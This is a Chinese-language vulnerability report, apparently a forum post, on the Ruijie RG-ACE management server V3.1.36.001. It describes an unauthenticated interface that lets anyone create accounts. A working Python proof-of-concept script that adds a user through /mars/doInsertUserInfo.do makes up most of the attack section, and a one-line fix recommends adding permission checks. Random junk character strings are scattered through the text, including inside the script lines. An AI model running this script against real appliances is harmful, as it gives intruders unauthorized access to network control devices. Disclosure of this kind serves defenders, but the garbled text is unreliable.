锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
, y1 Q. n) C; O! ~

0 o1 l! G, l: R测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
7 J5 O( L4 R. F8 {2 V
8 X  B+ O; G' @3 m
5 G+ X( d& v7 r漏洞证明：

; _  k# J6 e* N( g5 \


; X5 ^4 s" i: @
% Q- ?# @. n6 [$ B3 o0 Q/ B
执行脚本
- `& H6 O) t' n5 G! N8 l#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
% g& W0 S) B% W$ ?: [import urllib2, urllib,cookielib
1 Q$ A# f6 ?7 U" S) |$ K* A/ S! A1 a# ?; Aurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
0 g$ k) y0 P5 h2 }opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
" H* {( ~7 q% g6 J- ~("trueName","ad"),
" h# |* U7 A: S0 I- S/ W("email",""),
("mobilePhone",""),
("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

1 w+ }# P1 Y1 P! u( T- M2 Z登录，连接设备
" l: Y' z+ ~# c7 r! s' y* ?. g
7 h/ i/ j- Y% ~% I



默认的管理员admin权限更大点
/ |7 s1 U# n6 K# ?/ n; P( X, o


; k' E: S0 b- o3 r/ B+ L1 ?0 Q  k
- R8 a. A/ i+ H- y! Q2 @/ C
修复方案：
加强对接口的权限验证
: P1 r7 [9 p3 k$ W* A
/ q! F5 G1 E6 J" i3 W$ R